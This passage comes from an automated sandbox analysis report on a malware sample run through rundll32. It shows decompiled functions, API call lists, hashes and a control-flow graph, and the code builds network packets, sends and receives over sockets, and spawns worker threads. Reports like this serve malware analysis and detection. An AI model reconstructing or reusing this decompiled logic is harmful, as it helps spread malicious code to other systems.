                                                                                                                                                  													if(E047733A4(_t229, _a4, _a12,  *_a16 & 0x0000ffff, _t248, _a8, _t205) == 0) {
                                                                                                                                                  														goto L22;
                                                                                                                                                  													} else {
                                                                                                                                                  														 *(_a12 + 0x22) = _v20;
                                                                                                                                                  														goto L21;
                                                                                                                                                  													}
                                                                                                                                                  													L38:
                                                                                                                                                  													HeapFree(GetProcessHeap(), 8, _a8);
                                                                                                                                                  													goto L13;
                                                                                                                                                  												}
                                                                                                                                                  												goto L41;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t248 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                                                                  												if(_t248 != 0) {
                                                                                                                                                  													 *((intOrPtr*)(_t248 + 8)) = 1;
                                                                                                                                                  													 *((intOrPtr*)(_t248 + 0x18)) = 1;
                                                                                                                                                  													 *_t248 = 0x12;
                                                                                                                                                  													 *((intOrPtr*)(_t248 + 4)) = 0;
                                                                                                                                                  													 *((intOrPtr*)(_t248 + 0xc)) = 0;
                                                                                                                                                  													 *((intOrPtr*)(_t248 + 0x10)) = 0;
                                                                                                                                                  													 *((intOrPtr*)(_t248 + 0x14)) = 0;
                                                                                                                                                  													 *((intOrPtr*)(_t248 + 0x1c)) = 0x48;
                                                                                                                                                  													 *((intOrPtr*)(_t248 + 0x20)) = ( *(_t251 + 0x88) & 0x0000ffff) + ( *(_t251 + 0x59) & 0x000000ff);
                                                                                                                                                  													_t218 = 2;
                                                                                                                                                  													 *((short*)(_t248 + 0x25)) = _t218;
                                                                                                                                                  													if(E04773209( *(_t251 + 0x59) & 0x000000ff, _a4, _a12,  *_a16 & 0x0000ffff, _t248, _a8, _t218) != 0) {
                                                                                                                                                  														L21:
                                                                                                                                                  														_v8 = _v8 & 0x00000000;
                                                                                                                                                  													}
                                                                                                                                                  													L22:
                                                                                                                                                  													HeapFree(GetProcessHeap(), 8, _t248);
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											L23:
                                                                                                                                                  											if(_v8 == 0) {
                                                                                                                                                  												Sleep(0x7d0);
                                                                                                                                                  												_t249 = HeapAlloc(GetProcessHeap(), 8, 0x29);
                                                                                                                                                  												if(_t249 != 0) {
                                                                                                                                                  													_t172 = 4;
                                                                                                                                                  													 *((intOrPtr*)(_t249 + 4)) = _t172;
                                                                                                                                                  													 *((intOrPtr*)(_t249 + 0xc)) = _t172;
                                                                                                                                                  													 *((intOrPtr*)(_t249 + 0x14)) = _t172;
                                                                                                                                                  													_t173 = 5;
                                                                                                                                                  													 *((short*)(_t249 + 0x25)) = _t173;
                                                                                                                                                  													_t174 = 7;
                                                                                                                                                  													 *(_t249 + 0x27) = _t174;
                                                                                                                                                  													 *_t249 = 0x13;
                                                                                                                                                  													 *((intOrPtr*)(_t249 + 0x18)) = 0x4c;
                                                                                                                                                  													_t233 = _a8;
                                                                                                                                                  													 *((short*)(_a8 + 3)) =  *_a16;
                                                                                                                                                  													_t245 =  *(_t249 + 0x27) & 0x0000ffff;
                                                                                                                                                  													_v24 = ( *(_a12 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff;
                                                                                                                                                  													_v8 = E047732AF(_a4, _a12, ( *(_a12 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff, _t249, _a8,  *(_t249 + 0x27) & 0x0000ffff);
                                                                                                                                                  													HeapFree(GetProcessHeap(), 8, _t249);
                                                                                                                                                  													_v8 = 0xbadf00d;
                                                                                                                                                  													if(_v8 == 0x10002) {
                                                                                                                                                  														_t253 = _a16;
                                                                                                                                                  														if(E04773680(_t233, _a4, _a12, _v24,  *_a16 & 0x0000ffff, _v16,  &_v12) != 0 && E047741E9(_t233, _t245, _a4,  &_a12,  *_t253 & 0x0000ffff,  &_v12) != 0) {
                                                                                                                                                  															_v8 = _v8 & 0x00000000;
                                                                                                                                                  														}
                                                                                                                                                  														_t251 = _v12;
                                                                                                                                                  													} else {
                                                                                                                                                  														if(((0 | _v16 == 0x00000000) & (0 | 1 ==  *_t251) & (0 | _a20 == 0x00000005)) != 0) {
                                                                                                                                                  															 *_t251 = 0;
                                                                                                                                                  															goto L28;
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											goto L38;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									L41:
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					L13:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _t251);
                                                                                                                                                  				}
                                                                                                                                                  				return _v8;
                                                                                                                                                  				goto L41;
                                                                                                                                                  			}
























                                                                                                                                                  0x047746c7
                                                                                                                                                  0x047746dd
                                                                                                                                                  0x047746ed
                                                                                                                                                  0x047746ef
                                                                                                                                                  0x047746f4
                                                                                                                                                  0x04774aa4
                                                                                                                                                  0x047746fa
                                                                                                                                                  0x047746fa
                                                                                                                                                  0x04774702
                                                                                                                                                  0x04774717
                                                                                                                                                  0x0477471e
                                                                                                                                                  0x04774731
                                                                                                                                                  0x04774734
                                                                                                                                                  0x04774739
                                                                                                                                                  0x0477473f
                                                                                                                                                  0x04774743
                                                                                                                                                  0x0477475a
                                                                                                                                                  0x04774761
                                                                                                                                                  0x04774788
                                                                                                                                                  0x047747ae
                                                                                                                                                  0x047747ae
                                                                                                                                                  0x0477478a
                                                                                                                                                  0x0477478f
                                                                                                                                                  0x047747a6
                                                                                                                                                  0x047747c2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047747a8
                                                                                                                                                  0x047747a8
                                                                                                                                                  0x047747ac
                                                                                                                                                  0x0477475e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047747ac
                                                                                                                                                  0x047747a6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774788
                                                                                                                                                  0x047747cb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774745
                                                                                                                                                  0x04774756
                                                                                                                                                  0x047747ce
                                                                                                                                                  0x047747d9
                                                                                                                                                  0x047747e7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047747e9
                                                                                                                                                  0x047747f9
                                                                                                                                                  0x047747fb
                                                                                                                                                  0x04774800
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774802
                                                                                                                                                  0x04774806
                                                                                                                                                  0x04774959
                                                                                                                                                  0x0477495d
                                                                                                                                                  0x04774966
                                                                                                                                                  0x0477496c
                                                                                                                                                  0x04774970
                                                                                                                                                  0x04774976
                                                                                                                                                  0x0477497c
                                                                                                                                                  0x04774982
                                                                                                                                                  0x04774988
                                                                                                                                                  0x0477498c
                                                                                                                                                  0x04774992
                                                                                                                                                  0x04774998
                                                                                                                                                  0x0477499e
                                                                                                                                                  0x047749a2
                                                                                                                                                  0x047749a2
                                                                                                                                                  0x047749a6
                                                                                                                                                  0x047749b2
                                                                                                                                                  0x047749bb
                                                                                                                                                  0x047749bc
                                                                                                                                                  0x047749be
                                                                                                                                                  0x047749cb
                                                                                                                                                  0x047749db
                                                                                                                                                  0x047749df
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047749e5
                                                                                                                                                  0x047749e7
                                                                                                                                                  0x047749ec
                                                                                                                                                  0x047749f2
                                                                                                                                                  0x047749f6
                                                                                                                                                  0x047749fa
                                                                                                                                                  0x04774a01
                                                                                                                                                  0x04774a05
                                                                                                                                                  0x04774a06
                                                                                                                                                  0x04774a0a
                                                                                                                                                  0x04774a1a
                                                                                                                                                  0x04774a1e
                                                                                                                                                  0x04774a23
                                                                                                                                                  0x04774a3c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774a42
                                                                                                                                                  0x04774a49
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774a49
                                                                                                                                                  0x04774a91
                                                                                                                                                  0x04774a99
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774a99
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477480c
                                                                                                                                                  0x04774815
                                                                                                                                                  0x0477481b
                                                                                                                                                  0x04774820
                                                                                                                                                  0x04774823
                                                                                                                                                  0x04774826
                                                                                                                                                  0x04774829
                                                                                                                                                  0x0477482c
                                                                                                                                                  0x0477482f
                                                                                                                                                  0x04774832
                                                                                                                                                  0x04774835
                                                                                                                                                  0x0477484b
                                                                                                                                                  0x0477484e
                                                                                                                                                  0x04774853
                                                                                                                                                  0x0477486c
                                                                                                                                                  0x0477486e
                                                                                                                                                  0x0477486e
                                                                                                                                                  0x0477486e
                                                                                                                                                  0x04774872
                                                                                                                                                  0x04774878
                                                                                                                                                  0x04774878
                                                                                                                                                  0x0477481b
                                                                                                                                                  0x0477487e
                                                                                                                                                  0x04774882
                                                                                                                                                  0x0477488d
                                                                                                                                                  0x047748a0
                                                                                                                                                  0x047748a4
                                                                                                                                                  0x047748ac
                                                                                                                                                  0x047748af
                                                                                                                                                  0x047748b2
                                                                                                                                                  0x047748b5
                                                                                                                                                  0x047748b8
                                                                                                                                                  0x047748bb
                                                                                                                                                  0x047748bf
                                                                                                                                                  0x047748c0
                                                                                                                                                  0x047748c7
                                                                                                                                                  0x047748ca
                                                                                                                                                  0x047748eb
                                                                                                                                                  0x047748ee
                                                                                                                                                  0x047748f2
                                                                                                                                                  0x04774900
                                                                                                                                                  0x0477490e
                                                                                                                                                  0x04774914
                                                                                                                                                  0x04774921
                                                                                                                                                  0x04774928
                                                                                                                                                  0x04774a52
                                                                                                                                                  0x04774a70
                                                                                                                                                  0x04774a8a
                                                                                                                                                  0x04774a8a
                                                                                                                                                  0x04774a8e
                                                                                                                                                  0x0477492e
                                                                                                                                                  0x0477494e
                                                                                                                                                  0x04774956
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774956
                                                                                                                                                  0x0477494e
                                                                                                                                                  0x04774928
                                                                                                                                                  0x047748a4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774882
                                                                                                                                                  0x04774800
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047747e7
                                                                                                                                                  0x04774756
                                                                                                                                                  0x04774743
                                                                                                                                                  0x0477473f
                                                                                                                                                  0x047747b1
                                                                                                                                                  0x047747b7
                                                                                                                                                  0x047747b7
                                                                                                                                                  0x04774ab2
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000090,?,?,00000000,00000000,?,00000000,00000000,?), ref: 047746E4
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047746E7
                                                                                                                                                    • Part of subcall function 04772497: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,0477471C,?,?,?,?,?), ref: 047724AF
                                                                                                                                                    • Part of subcall function 04772497: HeapAlloc.KERNEL32(00000000,?,?,?,0477471C,?,?,?,?,?), ref: 047724B8
                                                                                                                                                    • Part of subcall function 04772497: GetProcessHeap.KERNEL32(00000008,00001124,74CB4F20,?,?,?,0477471C,?,?,?,?,?), ref: 047724CD
                                                                                                                                                    • Part of subcall function 04772497: HeapAlloc.KERNEL32(00000000,?,?,?,0477471C,?,?,?,?,?), ref: 047724D0
                                                                                                                                                    • Part of subcall function 04772497: rand.MSVCRT ref: 047724E1
                                                                                                                                                    • Part of subcall function 04772497: htons.WS2_32(00001120), ref: 047724FF
                                                                                                                                                    • Part of subcall function 04772497: rand.MSVCRT ref: 0477255F
                                                                                                                                                    • Part of subcall function 04772497: GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,0477471C,?,?,?,?,?), ref: 04772576
                                                                                                                                                    • Part of subcall function 04772497: HeapAlloc.KERNEL32(00000000,?,?,?,0477471C,?,?,?,?,?), ref: 0477257D
                                                                                                                                                    • Part of subcall function 04772497: htons.WS2_32(0000015C), ref: 0477259F
                                                                                                                                                    • Part of subcall function 04772497: rand.MSVCRT ref: 047725CD
                                                                                                                                                  • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0477478F
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?), ref: 047747B4
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 047747B7
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000100,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 047747F0
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047747F9
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000027), ref: 04774810
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04774813
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000002), ref: 04774875
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04774878
                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 0477488D
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000029), ref: 04774897
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0477489A
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?), ref: 04774911
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04774914
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000013), ref: 047749D2
                                                                                                                                                    • Part of subcall function 04772E12: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04772E32
                                                                                                                                                    • Part of subcall function 04772E12: HeapAlloc.KERNEL32(00000000), ref: 04772E3B
                                                                                                                                                    • Part of subcall function 04772E12: GetProcessHeap.KERNEL32(00000008,00000048,74CB4F20), ref: 04772E4D
                                                                                                                                                    • Part of subcall function 04772E12: HeapAlloc.KERNEL32(00000000), ref: 04772E50
                                                                                                                                                    • Part of subcall function 04772E12: htons.WS2_32(00000044), ref: 04772E68
                                                                                                                                                    • Part of subcall function 04772E12: send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04772EF3
                                                                                                                                                    • Part of subcall function 04772E12: recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04772F0B
                                                                                                                                                    • Part of subcall function 04772E12: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04772F31
                                                                                                                                                    • Part of subcall function 04772E12: HeapFree.KERNEL32(00000000), ref: 04772F38
                                                                                                                                                    • Part of subcall function 04772E12: GetProcessHeap.KERNEL32(00000008,?), ref: 04772F43
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047749D5
                                                                                                                                                    • Part of subcall function 04773680: GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74CB4F20,?,?,04774A6E,?,?,?,?,00000000,?), ref: 04773698
                                                                                                                                                    • Part of subcall function 04773680: HeapAlloc.KERNEL32(00000000,?,?,04774A6E,?,?,?,?,00000000,?), ref: 047736A1
                                                                                                                                                    • Part of subcall function 04773680: GetProcessHeap.KERNEL32(00000008,00000027,?,?,04774A6E,?,?,?,?,00000000,?), ref: 047736B1
                                                                                                                                                    • Part of subcall function 04773680: HeapAlloc.KERNEL32(00000000,?,?,04774A6E,?,?,?,?,00000000,?), ref: 047736B4
                                                                                                                                                    • Part of subcall function 04773680: GetProcessHeap.KERNEL32(00000008,00000013,?,?,04774A6E,?,?,?,?,00000000,?), ref: 047736C7
                                                                                                                                                    • Part of subcall function 04773680: HeapAlloc.KERNEL32(00000000,?,?,04774A6E,?,?,?,?,00000000,?), ref: 047736CA
                                                                                                                                                    • Part of subcall function 04773680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,04774A6E,?,?,?,?,00000000,?), ref: 047737A2
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04774A96
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04774A99
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$Alloc$Free$Sleephtonsrand$recvsend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3041643382-0
                                                                                                                                                  • Opcode ID: 198654867a7911265a78818598e71c0f58295f5f4f0d94bc94422b356966de65
                                                                                                                                                  • Instruction ID: 121bdaaa92c914a29ee73d798457925df7c914cba5070a0e52a208fb2e580efa
                                                                                                                                                  • Opcode Fuzzy Hash: 198654867a7911265a78818598e71c0f58295f5f4f0d94bc94422b356966de65
                                                                                                                                                  • Instruction Fuzzy Hash: B4C1CC7150034AEEEF10CFA4C804AAABBB9FF49344F508459F995D7790E734E950DBA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 402 477a1a9-477a1c7 403 477a1d0-477a1fa GetProcessHeap HeapAlloc 402->403 404 477a1c9-477a1cb call 477a016 402->404 405 477a200-477a213 GetProcessHeap HeapAlloc 403->405 406 477a32a-477a330 403->406 404->403 405->406 408 477a219-477a229 call 4776b0e 405->408 408->406 411 477a22f-477a235 408->411 412 477a245-477a24c 411->412 413 477a271 412->413 414 477a24e-477a260 CreateThread 412->414 417 477a275 413->417 415 477a266-477a26f 414->415 416 477a322-477a325 call 4776b46 414->416 415->417 416->406 418 477a277-477a27b 417->418 420 477a286-477a2af GetModuleHandleA GetProcAddress 418->420 421 477a27d-477a284 418->421 420->416 423 477a2b1-477a2b6 420->423 421->418 421->420 424 477a2d3-477a2d6 423->424 425 477a2b8-477a2be 423->425 427 477a2ea-477a2f7 GetProcessHeap HeapAlloc 424->427 428 477a2d8-477a2e7 CloseHandle 424->428 426 477a2c0-477a2c5 425->426 429 477a2c7-477a2ca 426->429 430 477a2ce-477a2d1 426->430 427->416 431 477a2f9-477a30c GetProcessHeap HeapAlloc 427->431 428->427 429->426 432 477a2cc 429->432 430->427 431->416 433 477a30e-477a315 call 4776ad0 431->433 432->427 435 477a31a-477a31c 433->435 435->416 436 477a237-477a243 435->436 436->412
                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                  			E0477A1A9() {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				void _v20;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				void* _v48;
                                                                                                                                                  				signed int _v52;
                                                                                                                                                  				signed int _t46;
                                                                                                                                                  				void* _t53;
                                                                                                                                                  				intOrPtr _t54;
                                                                                                                                                  				signed int _t55;
                                                                                                                                                  				_Unknown_base(*)()* _t57;
                                                                                                                                                  				signed int _t58;
                                                                                                                                                  				void* _t63;
                                                                                                                                                  				void* _t64;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				signed int _t67;
                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t75;
                                                                                                                                                  				signed int _t78;
                                                                                                                                                  				void* _t82;
                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t84;
                                                                                                                                                  				void** _t86;
                                                                                                                                                  				void* _t92;
                                                                                                                                                  
                                                                                                                                                  				_v24 =  *0x4787bb8;
                                                                                                                                                  				_t46 =  !( *0x4787bc0 >> 2) & 0x00000001;
                                                                                                                                                  				_v20 = _t46;
                                                                                                                                                  				if(_t46 != 0) {
                                                                                                                                                  					_push(0); // executed
                                                                                                                                                  					E0477A016(); // executed
                                                                                                                                                  				}
                                                                                                                                                  				_v52 = _v52 & 0x00000000;
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				_t82 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                                                                  				if(_t82 == 0) {
                                                                                                                                                  					L27:
                                                                                                                                                  					return 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					 *_t82 = _v20;
                                                                                                                                                  					_t53 = HeapAlloc(GetProcessHeap(), 8, 0x21);
                                                                                                                                                  					 *(_t82 + 4) = _t53;
                                                                                                                                                  					_t95 = _t53;
                                                                                                                                                  					if(_t53 == 0) {
                                                                                                                                                  						goto L27;
                                                                                                                                                  					}
                                                                                                                                                  					_t54 = E04776B0E(_v24, _t95, _t53);
                                                                                                                                                  					_t75 = 0;
                                                                                                                                                  					_v28 = _t54;
                                                                                                                                                  					if(_t54 == 0) {
                                                                                                                                                  						goto L27;
                                                                                                                                                  					}
                                                                                                                                                  					_v8 = 0;
                                                                                                                                                  					_v16 = 0;
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_v12 = _t75;
                                                                                                                                                  						if(_v8 == 6) {
                                                                                                                                                  							goto L10;
                                                                                                                                                  						}
                                                                                                                                                  						_t65 = CreateThread(_t75, _t75, E0477A112, _t82, _t75, _t75); // executed
                                                                                                                                                  						if(_t65 == 0) {
                                                                                                                                                  							L26:
                                                                                                                                                  							E04776B46(_v28);
                                                                                                                                                  							goto L27;
                                                                                                                                                  						}
                                                                                                                                                  						 *(_t92 + _v8 * 4 - 0x30) = _t65;
                                                                                                                                                  						_t75 = 0;
                                                                                                                                                  						L11:
                                                                                                                                                  						_t55 = 0;
                                                                                                                                                  						while( *((intOrPtr*)(_t92 + _t55 * 4 - 0x30)) != _t75) {
                                                                                                                                                  							_v12 =  &(_v12->nLength);
                                                                                                                                                  							_t55 = _t55 + 1;
                                                                                                                                                  							if(_t55 != 6) {
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						_t57 = GetProcAddress(GetModuleHandleA("kernel32"), "WaitForMultipleObjects");
                                                                                                                                                  						_t84 = _v12;
                                                                                                                                                  						_t58 =  *_t57(_t84,  &_v52, 0, _v16);
                                                                                                                                                  						if(_t58 == 0xffffffff) {
                                                                                                                                                  							goto L26;
                                                                                                                                                  						}
                                                                                                                                                  						if(_t58 != 0x102) {
                                                                                                                                                  							__eflags = _t58 - _t84 - 1;
                                                                                                                                                  							if(_t58 <= _t84 - 1) {
                                                                                                                                                  								_t86 = _t92 + _t58 * 4 - 0x30;
                                                                                                                                                  								_v8 = _t58;
                                                                                                                                                  								CloseHandle( *_t86);
                                                                                                                                                  								 *_t86 =  *_t86 & 0x00000000;
                                                                                                                                                  								__eflags =  *_t86;
                                                                                                                                                  							}
                                                                                                                                                  							L23:
                                                                                                                                                  							_t82 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                                                                  							if(_t82 == 0) {
                                                                                                                                                  								goto L26;
                                                                                                                                                  							}
                                                                                                                                                  							_t63 = HeapAlloc(GetProcessHeap(), 8, 0x21);
                                                                                                                                                  							_t77 = _v20;
                                                                                                                                                  							 *(_t82 + 4) = _t63;
                                                                                                                                                  							 *_t82 = _v20;
                                                                                                                                                  							if(_t63 == 0) {
                                                                                                                                                  								goto L26;
                                                                                                                                                  							}
                                                                                                                                                  							_t64 = E04776AD0(_t77, _t63); // executed
                                                                                                                                                  							if(_t64 != 0) {
                                                                                                                                                  								_t75 = 0;
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  							goto L26;
                                                                                                                                                  						}
                                                                                                                                                  						_t78 = 6;
                                                                                                                                                  						_v8 = _t78;
                                                                                                                                                  						_t67 = 0;
                                                                                                                                                  						while( *((intOrPtr*)(_t92 + _t67 * 4 - 0x30)) != 0) {
                                                                                                                                                  							_t67 = _t67 + 1;
                                                                                                                                                  							if(_t67 != _t78) {
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  							goto L23;
                                                                                                                                                  						}
                                                                                                                                                  						_v8 = _t67;
                                                                                                                                                  						goto L23;
                                                                                                                                                  						L10:
                                                                                                                                                  						_t18 =  &_v16;
                                                                                                                                                  						 *_t18 = _v16 | 0xffffffff;
                                                                                                                                                  						__eflags =  *_t18;
                                                                                                                                                  						goto L11;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}



























                                                                                                                                                  0x0477a1b4
                                                                                                                                                  0x0477a1c1
                                                                                                                                                  0x0477a1c4
                                                                                                                                                  0x0477a1c7
                                                                                                                                                  0x0477a1c9
                                                                                                                                                  0x0477a1cb
                                                                                                                                                  0x0477a1cb
                                                                                                                                                  0x0477a1d0
                                                                                                                                                  0x0477a1e2
                                                                                                                                                  0x0477a1e3
                                                                                                                                                  0x0477a1e4
                                                                                                                                                  0x0477a1e5
                                                                                                                                                  0x0477a1ea
                                                                                                                                                  0x0477a1f6
                                                                                                                                                  0x0477a1fa
                                                                                                                                                  0x0477a32a
                                                                                                                                                  0x0477a330
                                                                                                                                                  0x0477a200
                                                                                                                                                  0x0477a207
                                                                                                                                                  0x0477a20c
                                                                                                                                                  0x0477a20e
                                                                                                                                                  0x0477a211
                                                                                                                                                  0x0477a213
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a21d
                                                                                                                                                  0x0477a222
                                                                                                                                                  0x0477a224
                                                                                                                                                  0x0477a229
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a22f
                                                                                                                                                  0x0477a232
                                                                                                                                                  0x0477a245
                                                                                                                                                  0x0477a249
                                                                                                                                                  0x0477a24c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a258
                                                                                                                                                  0x0477a260
                                                                                                                                                  0x0477a322
                                                                                                                                                  0x0477a325
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a325
                                                                                                                                                  0x0477a269
                                                                                                                                                  0x0477a26d
                                                                                                                                                  0x0477a275
                                                                                                                                                  0x0477a275
                                                                                                                                                  0x0477a277
                                                                                                                                                  0x0477a27d
                                                                                                                                                  0x0477a280
                                                                                                                                                  0x0477a284
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a284
                                                                                                                                                  0x0477a297
                                                                                                                                                  0x0477a2a0
                                                                                                                                                  0x0477a2aa
                                                                                                                                                  0x0477a2af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a2b6
                                                                                                                                                  0x0477a2d4
                                                                                                                                                  0x0477a2d6
                                                                                                                                                  0x0477a2d8
                                                                                                                                                  0x0477a2de
                                                                                                                                                  0x0477a2e1
                                                                                                                                                  0x0477a2e7
                                                                                                                                                  0x0477a2e7
                                                                                                                                                  0x0477a2e7
                                                                                                                                                  0x0477a2ea
                                                                                                                                                  0x0477a2f3
                                                                                                                                                  0x0477a2f7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a300
                                                                                                                                                  0x0477a302
                                                                                                                                                  0x0477a305
                                                                                                                                                  0x0477a308
                                                                                                                                                  0x0477a30c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a315
                                                                                                                                                  0x0477a31c
                                                                                                                                                  0x0477a243
                                                                                                                                                  0x0477a243
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a243
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a31c
                                                                                                                                                  0x0477a2ba
                                                                                                                                                  0x0477a2bb
                                                                                                                                                  0x0477a2be
                                                                                                                                                  0x0477a2c0
                                                                                                                                                  0x0477a2c7
                                                                                                                                                  0x0477a2ca
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a2cc
                                                                                                                                                  0x0477a2ce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a271
                                                                                                                                                  0x0477a271
                                                                                                                                                  0x0477a271
                                                                                                                                                  0x0477a271
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477a271
                                                                                                                                                  0x0477a245

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 0477A1EB
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0477A1F4
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000021), ref: 0477A209
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0477A20C
                                                                                                                                                  • CreateThread.KERNELBASE ref: 0477A258
                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,WaitForMultipleObjects,00000000), ref: 0477A290
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0477A297
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0477A2E1
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 0477A2EE
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0477A2F1
                                                                                                                                                    • Part of subcall function 0477A016: GetCurrentThread.KERNEL32 ref: 0477A035
